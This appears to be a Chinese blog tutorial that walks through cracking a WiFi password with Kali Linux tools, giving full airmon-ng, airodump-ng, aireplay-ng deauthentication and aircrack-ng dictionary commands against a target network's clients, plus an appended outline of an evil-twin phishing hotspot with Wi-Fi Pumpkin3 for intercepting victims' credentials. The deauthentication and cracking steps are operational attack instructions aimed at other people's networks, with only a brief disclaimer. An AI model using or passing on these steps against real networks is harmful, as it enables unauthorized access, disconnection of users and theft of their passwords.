kali linux破解wifi密码-超详细过程

前期准备
        VMware Workstation虚拟机
        在虚拟机安装好kail linunx系统
        无线网卡(芯片为3070或者1887L都支持Linux)(或者直接某宝上查kali无线网卡)

一.打开终端,用airmon-ng命令查看


如果出现无法访问…没有那个文件或目录
解决办法:先在window主机上按win+r键然后输入services.msc
回车


找到VMware USB Arbitration Service,双击

 

1.启动类型改为自动 …2.启动服务状态 …3.确定

二.打开虚拟机的设置,改成跟下图中2一样(如果为灰色无法更改,则需要关闭kail系统后再改)


将usb无线网卡插在电脑上,(注意:网卡芯片为3070或者8187L,买的时候要注意)(或者直接网上购买的时候查kali无线网卡
点击 虚拟机 -> 可移动设备 -> 选择那个有WLAN的 -> 连接

 

 
三.命令ifconfig查看网卡信息,有wlan0表示连接成功


四.命令airmon-ng start wlan0开启网卡监听模式

 在这里插入图片描述


五.输入iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示成功

在这里插入图片描述
六.命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务

 在这里插入图片描述

 BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码,STATION是连接WiFi终端的MAC地址

七,接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon

在这里插入图片描述

数据包已经正在抓取


如果抓取不到数据,新建一个终端:键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)

手机MAC地址上面扫描WiFi的时候提到了

如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon

在这里插入图片描述

 (0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,
数据包里面的密码是哈希加密的,哈希加密只能正向)

出现WPA handshake时,表示抓包成功

两个终端都按Ctrl+c停止,不然那边会一直断网的


cd打开抓包的目录,ls列出来,就看到我们抓到的数据包

在这里插入图片描述


八.解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz


如 :gzip -d /usr/share/wordlists/rockyou.txt.gz


九.键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破


如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

在这里插入图片描述

 耐心等待密码破解吧…

特别说明:暴力破解并不简单,需要足够强大的字典和时间,实现几率太小,自己玩玩就行了


 

### 使用 Kali Linux 进行 WiFi 钓鱼攻击 #### 工具介绍 Kali 的 Wi-Fi Pumpkin3 是一款专门用于网络安全测试的工具,能够执行无线网络渗透测试和社会工程学攻击。这款基于 Python 的框架允许用户模拟无线网络环境并实施多种类型的攻击[^2]。 #### 法律声明 值得注意的是,在未获得合法授权的情况下使用此类技术进行实际攻击活动属于违法行为。Wi-Fi Pumpkin3 应仅限于学习和教育用途,旨在提高人们对潜在安全风险的认识以及防御措施的学习[^4]。 #### 实施过程概述 为了创建一个钓鱼热点,通常会经历以下几个环节: - **安装依赖项** 确保系统已安装必要的软件包,如 `hostapd` 和 `dnsmasq` 来配置虚拟接入点和服务发现功能。 - **设置虚假AP** 利用 Wi-Fi Pumpkin3 创建假冒的真实 AP 名字相同的 SSID ,吸引目标设备自动连接或手动加入此恶意网络环境中。 - **捕获流量分析** 当受害者尝试访问互联网资源时,可以通过中间人方式拦截 HTTP 请求,并记录下敏感数据比如用户名密码等信息。 - **启动 DHCP 服务** 启动 DHCP 服务器以分配 IP 地址给连接到伪造 Wi-Fi 的客户端设备。命令如下所示: ```bash dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 ``` #### 安全建议 强烈反对任何非法利用上述方法的行为;相反,鼓励读者通过正规渠道获取相关技能训练,以便更好地保护个人隐私与企业信息安全。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值